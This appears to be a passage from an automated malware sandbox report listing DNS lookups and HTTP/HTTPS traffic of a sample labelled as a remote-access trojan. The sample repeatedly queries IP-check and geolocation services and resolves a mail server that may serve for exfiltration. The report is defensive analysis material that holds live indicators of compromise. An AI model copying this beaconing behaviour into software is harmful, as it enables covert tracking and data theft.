            Jul 26, 2024 11:39:20.589668989 CEST53526241.1.1.1192.168.2.5

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jul 26, 2024 11:38:59.371063948 CEST192.168.2.51.1.1.10x1f25Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 26, 2024 11:39:04.877788067 CEST192.168.2.51.1.1.10x620dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
            Jul 26, 2024 11:39:20.246893883 CEST192.168.2.51.1.1.10x53deStandard query (0)mail.erkanlarofis.com.trA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jul 26, 2024 11:38:59.445704937 CEST1.1.1.1192.168.2.50x1f25No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 26, 2024 11:38:59.445704937 CEST1.1.1.1192.168.2.50x1f25No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 26, 2024 11:38:59.445704937 CEST1.1.1.1192.168.2.50x1f25No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 26, 2024 11:38:59.445704937 CEST1.1.1.1192.168.2.50x1f25No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 26, 2024 11:38:59.445704937 CEST1.1.1.1192.168.2.50x1f25No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 26, 2024 11:38:59.445704937 CEST1.1.1.1192.168.2.50x1f25No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 26, 2024 11:39:04.886856079 CEST1.1.1.1192.168.2.50x620dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
            Jul 26, 2024 11:39:04.886856079 CEST1.1.1.1192.168.2.50x620dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
            Jul 26, 2024 11:39:20.589668989 CEST1.1.1.1192.168.2.50x53deNo error (0)mail.erkanlarofis.com.trerkanlarofis.com.trCNAME (Canonical name)IN (0x0001)false
            Jul 26, 2024 11:39:20.589668989 CEST1.1.1.1192.168.2.50x53deNo error (0)erkanlarofis.com.tr77.245.159.7A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • reallyfreegeoip.org
            • checkip.dyndns.org

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.549706158.101.44.242804040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            Jul 26, 2024 11:38:59.511497021 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:01.480242014 CEST320INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:01 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: f8553c7613fd4c2c917d768e17b67a2d
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 26, 2024 11:39:01.486656904 CEST127OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Jul 26, 2024 11:39:04.847099066 CEST320INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:04 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 4bee44812ef03ede1e946b9e6fbc3aef
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 26, 2024 11:39:05.559277058 CEST127OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Jul 26, 2024 11:39:05.731045961 CEST320INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:05 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 9704821eddf53b5eb899522d421ef23f
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.549712158.101.44.242804040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            Jul 26, 2024 11:39:06.413347006 CEST127OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Jul 26, 2024 11:39:06.989404917 CEST320INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:06 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 25587af39e0d567b321045d2c6246783
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.549714158.101.44.242804040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            Jul 26, 2024 11:39:07.690953970 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:08.324615955 CEST320INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:08 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: db7e2095471602765a649e5f79ed7e69
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.549716158.101.44.242804040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            Jul 26, 2024 11:39:08.947376013 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:09.533092022 CEST320INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:09 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: c8c9810e359b7534489d2aa7a985bf96
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.549718158.101.44.242804040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            Jul 26, 2024 11:39:10.185650110 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:10.778944969 CEST320INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:10 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 1efff3dca87174f3c0a4f16af43c8da5
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.549720158.101.44.242804040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            Jul 26, 2024 11:39:11.485342979 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:12.280565977 CEST320INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:12 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 572deb602e5b95ce4723bc9f5750b5d3
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 26, 2024 11:39:12.301397085 CEST320INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:12 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 572deb602e5b95ce4723bc9f5750b5d3
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.549722158.101.44.242804040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            Jul 26, 2024 11:39:12.917669058 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:13.480638027 CEST320INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:13 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 33e9b6d1def81d96ff656bc8a2e385cf
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.549710188.114.97.34434040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            2024-07-26 09:39:05 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-26 09:39:05 UTC711INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:05 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9358
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j4AaaMvqLJk3JK8HiccFhYv7%2F8e9H0I%2F0exA80WaVYABu0Uv2Hf9parSO1sWJ6F8FvND%2BLGNVgaUV2USia3XM2l%2BpM6dPqmXRqKY2U%2F1TbIj5Er5MOV%2FS6hDj5ly48JYJKn0gLmK"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936ba74b4d7c81-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:05 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:05 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.549711188.114.97.34434040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            2024-07-26 09:39:06 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-26 09:39:06 UTC705INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:06 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9359
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tP2ojCoyh0j5hk4LQw389SHgTjjTIsQ4ALXbPz8if1JGha34vw6fR45v1IvnOMxpwY%2FkQNkQ6%2FEZ0AAz92jSjVwkjEyOlQ7RmIqWyo%2BAApqANJDYDO6he7qweWOfeTvXSJGICdtx"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bac8ba58c1d-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:06 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:06 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.549713188.114.97.34434040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            2024-07-26 09:39:07 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-26 09:39:07 UTC703INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:07 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9360
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xiwUuMv3Y6GnMjlAvHz3BmXzVXXGEuESNndMJHRUzUwPaIL6%2B6jVyTFsZqwiAabJKhyDejTMw8FNftDsuB8GkvPRRaSRAuglzCOjQ3c7XHtnrSW3pTZXyZzeGHRVg0Q41pUkIOh%2B"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bb47ece177c-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:07 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:07 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.549715188.114.97.34434040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            2024-07-26 09:39:08 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-26 09:39:08 UTC707INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:08 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9361
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nja%2BlfklVO8eatAurvtWjNybmKy2lA0yrOx3L%2FhtyNLHz%2BC8tFhlafBjXVF2IDdtox5dDa4HBRMgz04seE4F8lRlwFva1mK22qoBjPTZTNQIxxC2mm1Cm6XrPU5icRVaMCRJ%2BtHn"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bbc786619fb-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:08 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.549717188.114.97.34434040C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            TimestampBytes transferredDirectionData
            2024-07-26 09:39:10 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-26 09:39:10 UTC705INHTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:10 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9363
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0L0XQQVNmpq%2BkdS0W4hKcCWOMITM5F%2FXZ8Or1gzdxB4t41FPlHgIy8wdroR%2Fd1T5wwiGGBNGzD86TQBduB4yCYwldnvcJA3SVTh1Zd6sqiwrhD5khLZAE2X2g8xBH1FR52qLJs6b"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bc43d174308-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:10 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
